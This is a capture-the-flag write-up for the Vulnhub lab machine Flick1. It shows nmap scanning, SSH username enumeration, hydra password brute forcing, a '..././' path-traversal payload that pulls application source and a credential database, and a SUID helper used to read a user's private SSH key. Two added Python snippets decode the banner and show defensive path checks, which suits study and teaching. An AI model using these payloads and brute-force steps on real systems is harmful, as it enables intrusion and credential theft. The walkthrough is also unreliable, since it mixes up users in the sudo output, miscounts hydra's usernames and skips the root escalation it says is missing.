Flick1 - Vulnhub - Level: Medium - Report

Medium

Tools used

nmap
ssh
msfconsole
cat
echo
hydra
curl
nc
docker
ln
rm

Reconnaissance

In this section we carry out the first reconnaissance steps to gather information about the target system. This is essential for identifying potential attack vectors.

┌──(root㉿CCat)-[~]
└─# /etc/hosts
192.168.2.125 flick1.vln

The /etc/hosts file maps the IP address to the hostname "flick1.vln".

┌──(root㉿CCat)-[~]
└─# nmap -sS -sC -sV -A -p- $IP -Pn --min-rate 5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-05 22:32 CEST
Nmap scan report for flick1.vln (192.168.2.125)
Host is up (0.00015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE   VERSION
22/tcp   open  ssh       OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 04:d0:8d:4d:ee:87:30:e7:60:82:63:d3:a8:6e:4b:ac (DSA)
|   2048 64:ec:a9:9b:0b:c0:11:d4:08:63:cf:83:e1:db:23:9a (RSA)
|_  256 2d:32:93:ce:0e:54:3f:84:ee:01:c7:c0:bb:68:e2:02 (ECDSA)
8881/tcp open  galaxy4d?
| fingerprint-strings:
|   DNSStatusRequestTCP, GenericLines, NULL, RPCCheck:
|     Welcome to the admin server. A correct password will 'flick' the switch and open a new door:
|   DNSVersionBindReqTCP:
|     Welcome to the admin server. A correct password will 'flick' the switch and open a new door:
|     version
|     bind
|   FourhFourRequest:
|     Welcome to the admin server. A correct password will 'flick' the switch and open a new door:
|     /nice%20ports%2C/Tri%6Eity.txt%2ebak HTTP/1.0
|   GetRequest:
|     Welcome to the admin server. A correct password will 'flick' the switch and open a new door:
|     HTTP/1.0
|   HTTPptions:
|     Welcome to the admin server. A correct password will 'flick' the switch and open a new door:
|     OPTIONS / HTTP/1.0
|   RTSPRequest:
|     Welcome to the admin server. A correct password will 'flick' the switch and open a new door:
|_    OPTIONS / RTSP/1.0
MAC Address: 08:00:27:53:30:62 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

The Nmap scan shows that ports 22 (SSH) and 8881 are open. On port 8881 an "admin server" is listening that asks for a password.

Initial Access

In this section we try to gain initial access to the system.

┌──(root㉿CCat)-[~]
└─# ssh root@192.168.2.125
The authenticity of host '192.168.2.125 (192.168.2.125)' can't be established.
ECDSA key fingerprint is SHA256:gFkTDTD/D7ndkanMRwJI92zYuzltDSkS7E3sPlpPk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.2.125' (ECDSA) to the list of known hosts.

\x56\x6d\x30\x77\x64\x32\x51\x79\x55\x58\x6c\x56\x57\x47\x78\x57\x56\x30\x64\x34
\x56\x31\x59\x77\x5a\x44\x52\x57\x4d\x56\x6c\x33\x57\x6b\x52\x53\x57\x46\x4a\x74
\x65\x46\x5a\x56\x4d\x6a\x41\x31\x56\x6a\x41\x78\x56\x32\x4a\x45\x54\x6c\x68\x68
.o88o. oooo   o8o            oooo
888 `" `888   `"'            888
o888oo   888  oooo   .ooooo.   888  oooo
888     888  `888  d88' `"Y8  888 .8P'
888     888   888  888        888888.
888     888   888  888   .o8  888 `88b.
o888o   o888o o888o `Y8bod8P' o888o o888o

On the root login attempt the server prints an ASCII banner and a block of hex-encoded base64 data.

https://cyberchef.org/#recipe=From_Hex('Auto')From_Base64
tabupJievas8Knoj

Feeding the hex data into CyberChef gives us a password.
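The same decode step in Python, added here as an example and not part of the original writeup: the \xNN escapes printed in the banner are turned back into text, and base64 layers are then peeled off until the result no longer looks like base64. This generalises the CyberChef recipe (From_Hex, then From_Base64) to any number of layers. Because the banner shown above is truncated, the sample input is constructed inside the script by wrapping a made-up string the same way; only the first four escapes of the real banner are used, to show the hex step on page data.

```python
import base64
import binascii
import re
import string

_HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
_B64_ALPHABET = set(string.ascii_letters + string.digits + "+/=")


def unescape_hex(text: str) -> str:
    """Turn a run of \\xNN escapes (as printed in the SSH banner) into the
    text they encode. Whitespace or line breaks between escapes are ignored."""
    hex_digits = "".join(_HEX_ESCAPE.findall(text))
    return binascii.unhexlify(hex_digits).decode("ascii")


def looks_like_base64(s: str) -> bool:
    """Cheap heuristic: base64 alphabet only and a length that is a multiple of 4."""
    s = s.strip()
    return len(s) >= 4 and len(s) % 4 == 0 and set(s) <= _B64_ALPHABET


def peel_base64(s: str, max_layers: int = 16):
    """Repeatedly base64-decode while the result is printable text and still
    looks like base64. Returns (final_text, layers_removed). The heuristic can
    misfire on a short all-alphanumeric secret, so the layer count is returned
    as well, letting the caller see what happened."""
    layers = 0
    current = s.strip()
    while layers < max_layers and looks_like_base64(current):
        try:
            decoded = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break  # not really base64 (or binary payload): stop here
        if not decoded.isprintable():
            break
        current = decoded.strip()
        layers += 1
    return current, layers


def decode_banner(text: str):
    """Full pipeline: hex escapes -> text -> peel base64 layers."""
    return peel_base64(unescape_hex(text))


def build_sample(secret: str, layers: int = 3) -> str:
    """Constructed sample generator: base64 a string several times and
    hex-escape the result, the same shape as the banner on the box."""
    data = secret.encode()
    for _ in range(layers):
        data = base64.b64encode(data)
    return "".join(f"\\x{b:02x}" for b in data)


# Constructed input (not the banner from the page, which is truncated).
SAMPLE = build_sample("constructed-secret")

if __name__ == "__main__":
    secret, layers = decode_banner(SAMPLE)
    print(f"{layers} base64 layer(s) removed -> {secret!r}")
```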

┌──(root㉿CCat)-[~]
└─# msfconsole -q
search ssh_enum

We use Metasploit to enumerate SSH usernames.

use 0
set rhosts 192.168.2.125
set rport 22
set user_file /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
run
[*] 192.168.2.125:22 - SSH - Using malformed packet technique
[*] 192.168.2.125:22 - SSH - Checking for false positives
[*] 192.168.2.125:22 - SSH - Starting scan
[+] 192.168.2.125:22 - SSH - User 'mail' found
[+] 192.168.2.125:22 - SSH - User 'root' found
[+] 192.168.2.125:22 - SSH - User 'news' found
[+] 192.168.2.125:22 - SSH - User 'robin' found
[+] 192.168.2.125:22 - SSH - User 'dean' found
[+] 192.168.2.125:22 - SSH - User 'man' found
[+] 192.168.2.125:22 - SSH - User 'bin' found
[+] 192.168.2.125:22 - SSH - User 'games' found
[+] 192.168.2.125:22 - SSH - User 'nobody' found
[+] 192.168.2.125:22 - SSH - User 'backup' found
[+] 192.168.2.125:22 - SSH - User 'daemon' found
[+] 192.168.2.125:22 - SSH - User 'proxy' found
[+] 192.168.2.125:22 - SSH - User 'list' found
[+] 192.168.2.125:22 - SSH - User 'sys' found

We obtained the usernames with Metasploit.

cat namen.txt
robin root dean nobody

namen.txt stores the usernames.

nc -vv 192.168.2.125 8881
flick1.vln [192.168.2.125] 8881 (?) open
Welcome to the admin server. A correct password will 'flick' the switch and open a new door:
tabupJievas8Knoj
K: tabupJievas8Knoj

Accepted! The door should be open now :poolparty:

With the password the door should now open.

echo 'poolparty' > wort
echo ':poolparty' >> wort

A new password list for hydra.

hydra -L namen.txt -P wort ssh://flick1.vln -t 64
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these * ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-05 23:15:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 10 login tries (l:5/p:2), ~1 try per task
[DATA] attacking ssh://flick1.vln:22/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-05 23:15:28

Hydra is run, but the output yields nothing.

hosts entry
192.168.2.125 flick1.vln poolparty.flick.vln
curl http://poolparty.flick.vln
Flick-a-Photo
href="http://poolparty.flick.vln/login/login">Login to add a Photo

poolparty is the website where one can log in, as the hint indicated.

curl http://poolparty.flick.vln/image
Index of /image
[IC]	Name	Last modified	Size	Description
[DIR]	db/ 	07-Jul-2014 09:20 	-
[DIR]	scripts/ 	23-Apr-2014 08:00 	-
[DIR]	web/ 	07-Jul-2014 09:20 	-

An image directory.

Here is a JWT tool:
https://jwt.io/
{
  "iv": "2v5bYn4cGKz5Ly/ZsaiTjFHy8uwC9wGU5zc59hjliHM=",
  "value": "SC9dW28HGt1ClkCZ/ZyaHa611EaFbYTVxYjdTTDcHJbHhDZZYod5WB11jEaTQDXERauSzDKGVw72chsTvAg",
  "mac": "aa51e99472eb83232423c0dc9048d052e37c358d3181cb3e7b0209c6876b346f"
}

JWT data from the website.

Hydra
hydra -l demo -P /usr/share/wordlists/rockyou.txt flick1.vln http-post-form "/login/login:username=^USER^&password=^PASS^:Your username/password combination was incorrect" -t 64
[80][http-post-form] host: flick1.vln   login: demo   password: demo123

A password for the demo account is found.

URL
href="http://192.168.2.125/members/upload" Upload a photo
href="http://192.168.2.125/image/view/9C9kN5EloNXF

Upload page.

Privilege Escalation

In this section we try to escalate our privileges on the system in order to obtain root access.

Burpsuite
GET /image/download?filename=./index.php HTTP/1.1
Host: 192.168.2.125
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: keep-alive
Referer: http://192.168.2.125/
Cookie: laravel_session=eyJpdiI6IlpQaW50a....
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

Burp request that asks the download endpoint for a local file.

HTTP/1.1 200 OK
Date: Sat, 05 Oct 2024 22:10:38 GMT
Server: Apache/2.2.22 (Ubuntu)
Content-Disposition: attachment; filename="image.jpg"
Cache-Control: no-cache
X-Frame-Options: SAMEORIGIN
Set-Cookie: laravel_session=eyJpdiI6Im1UcytYzlnQUxwbXlLZm94UdkeUlcL2t5Ukt5NVAyK1NhekJuM0M....
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 1586

 Laravel - A PHP Framework For Web Artisans
  Register The Auto Loader
|--
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
 

require __DIR__.'/../bootstrap/autoload.php';

We can now read source code.

Files
GET /image/download?filename=..././composer.json HTTP/1.1
{
	"name": "laravel/laravel",
	"description": "The Laravel Framework.",
	"keywords": ["framework", "laravel"],
	"license": "MIT",
	"require": {
		"laravel/framework": "4.1.*"
	},
	"autoload": {
		"classmap": [
			"app/commands",
			"app/controllers",
			"app/models",
			"app/database/migrations",
			"app/database/seeds",
			"app/tests/TestCase.php"
		]
	},
	"scripts": {
		"post-install-cmd": [
			"php artisan clear-compiled",
			"php artisan optimize"
		],
		"post-update-cmd": [
			"php artisan clear-compiled",
			"php artisan optimize"
		],
		"post-create-project-cmd": [
			"php artisan key:generate"
		]
	},
	"config": {
		"preferred-install": "dist"
	},
	"minimum-stability": "stable"
}
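The `..././` payload in these requests only makes sense if the download handler removes `../` once and serves whatever is left: stripping one `../` from `..././x` leaves `../x`. The Python below is an added example, not the challenge's PHP (the handler's source is not on the page, so the filter is an assumption about it). It models that strip-and-serve filter, shows the input on which it fails, and sets the two defensive alternatives beside it: resolving the path and checking containment in the web root, and an allowlist of a single plain filename, which is what a photo download endpoint actually needs. The web root is a constructed placeholder.

```python
import posixpath
import re

# Constructed web root for the download handler (assumption; the real path is
# not shown on the page).
IMAGE_ROOT = "/var/www/app/public/image"


def naive_filter(filename: str) -> str:
    """Single-pass removal of '../'. Models the kind of filter the '..././'
    payload defeats (an assumption about the app): removing one '../' from
    '..././x' leaves '../x' behind, which is then served."""
    return filename.replace("../", "")


def naive_resolve(filename: str) -> str:
    """Strip, join, normalise: what a 'sanitise the input' handler does."""
    return posixpath.normpath(posixpath.join(IMAGE_ROOT, naive_filter(filename)))


def safe_resolve(filename: str):
    """Join, normalise, then check containment. Returns None for anything that
    would land outside IMAGE_ROOT (including absolute paths, which join()
    lets win). posixpath keeps the demo filesystem-independent; production
    code should call os.path.realpath on the joined path so symlinks are
    resolved before the containment check."""
    candidate = posixpath.normpath(posixpath.join(IMAGE_ROOT, filename))
    if candidate == IMAGE_ROOT or not candidate.startswith(IMAGE_ROOT + "/"):
        return None
    return candidate


_PLAIN_IMAGE = re.compile(r"^[A-Za-z0-9_-]+\.(jpe?g|png|gif)$")


def allowlist_resolve(filename: str):
    """Strictest option for a photo download endpoint: accept exactly one path
    component matching an allowlist of image names and reject everything else."""
    if not _PLAIN_IMAGE.fullmatch(filename):
        return None
    return posixpath.join(IMAGE_ROOT, filename)


if __name__ == "__main__":
    # "photo.jpg" is a constructed benign name; the other three are the
    # shapes of input seen in the requests above.
    for payload in ("./index.php", "../composer.json", "..././composer.json", "photo.jpg"):
        print(f"{payload!r:24} naive={naive_resolve(payload)!r}")
        print(f"{'':24} safe ={safe_resolve(payload)!r}")
        print(f"{'':24} allow={allowlist_resolve(payload)!r}")
```

The point of the three columns: the naive filter "works" on the obvious `../composer.json` (which is why such filters survive review) and fails on `..././composer.json`; the containment check treats `...` as an ordinary directory name and stays inside the root; the allowlist rejects both and only ever serves names of the expected shape.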
Files
GET /image/download?filename=..././app/routes.php HTTP/1.1
Route::get('/', 'HomeController@showIndex');

Route::controller('login', 'SessionController');
Route::controller('members', 'UploadController');
Route::controller('image', 'ViewController');
Files
GET /image/download?filename=..././app/controllers/SessionController.php HTTP/1.1
	Route::get('/', 'HomeController@showWelcome');

		// Haha :D
		// Decoy: a single quote in the username returns a fake SQL error
		// before the database is ever touched.
		if (strpos(Input::get('username'), "'") !== false)
			return Redirect::to('login/login')
				->withErrors("You have an error in your SQL syntax; check the manual that corresponds to your
                                   MySQL server version for the right syntax to use near '' AND user.password=' at line 1");

		// Actual auth attempt
		if (Auth::attempt(array('username'=>Input::get('username'), 'password'=>Input::get('password')))) {
			return Redirect::to('/')->with('message', 'You are now logged in!');
		} else {
			return Redirect::to('login/login')
				->withErrors('Your username/password combination was incorrect')
				->withInput();
		}
	}

	public function getLogout()
	{
		Auth::logout();
		return Redirect::action('HomeController@showIndex')
			->with('success', 'Successfully signed out');
	}

}

GET /image/download?filename=..././app/database/production.sqlite HTTP/1.1
 This file contains an SQLite 2.1 database
old_users (
 username text,
 password text
)
xdIIpaulnejEvibKugEdof0KebinAw6TogsacPayarkctIasejbon7Ni7Grocmyalkukvi --> Jrobin
JoofimwEakpalv4Jijyiat5GloonTojatticEirracksIg4yijovyirtAwUjad1
scujittyukIjwip0zicjoocAnIltAsh4Vuer4osDidsaiWipkDunipownIrtb5
FumKivcenfodErk0Chezauggyokyait5fojEpCayclEcyaj2heTwef0lNiphAnA

We look at the data in the SQLite database.

The SSH connection as user dean is established with the command
ssh dean@192.168.2.125

Password: FumKivcenfodErk0Chezauggyokyait5fojEpCayclEcyaj2heTwef0lNiphAnA

Now we are in.

.o88o. oooo   o8o            oooo
888 `" `888   `"'            888
o888oo   888  oooo   .ooooo.   888  oooo
888     888  `888  d88' `"Y8  888 .8P'
888     888   888  888        888888.
888     888   888  888   .o8  888 `88b.
o88o   o88o o888o `Y8bod8P' o888o o888o 

Banner shown at system login.

dean@flick$ sudo -l

Matching Defaults entries for robin on this host:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User robin may run the following commands on this host:
    (root) NPASSWD: /opt/start_apache/restart.sh

sudo rights for user robin.

dean@flick$ find / -type f -perm -4000 -ls 2>/dev/null
#7d10f3 12 -rwsr-xr-x 1 robin robin 8987 Aug 4 2014 /home/dean/read_docker

We find the known tool.

/home/robin/.ssh should contain the id_rsa; we use the tool to read it out.
./read_docker /home/robin/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIG4QIBAAKCAYEA03WmkCrIu0h33uI9p7jU1O81O7v50e7U54R6aM2TjFhB4p
.........................................................................
.........................................................................
-----END RSA PRIVATE KEY-----
Read successfully; now we try to log in.
ssh robin@flick -i /home/robin/.ssh/id_rsa
Here comes the code that was not complete. What is still missing: docker.

Privilege Escalation

In the directory there is a txt file: 53ca1c96115a7c156b14306b81df8f34e8a4bf8933cb687bd9334616f475dcbc

ls -lh /root

The flag is located here.

cat /realflag.txt
Congrats! You have completed 'flick'! I hope you have enjoyed doing it as much as I did creating it :) ciao for now! @leonjza

Privilege escalation successful.

Flags

Congrats! You have completed 'flick'! I hope you have enjoyed doing it as much as I did creating it :) ciao for now! @leonjza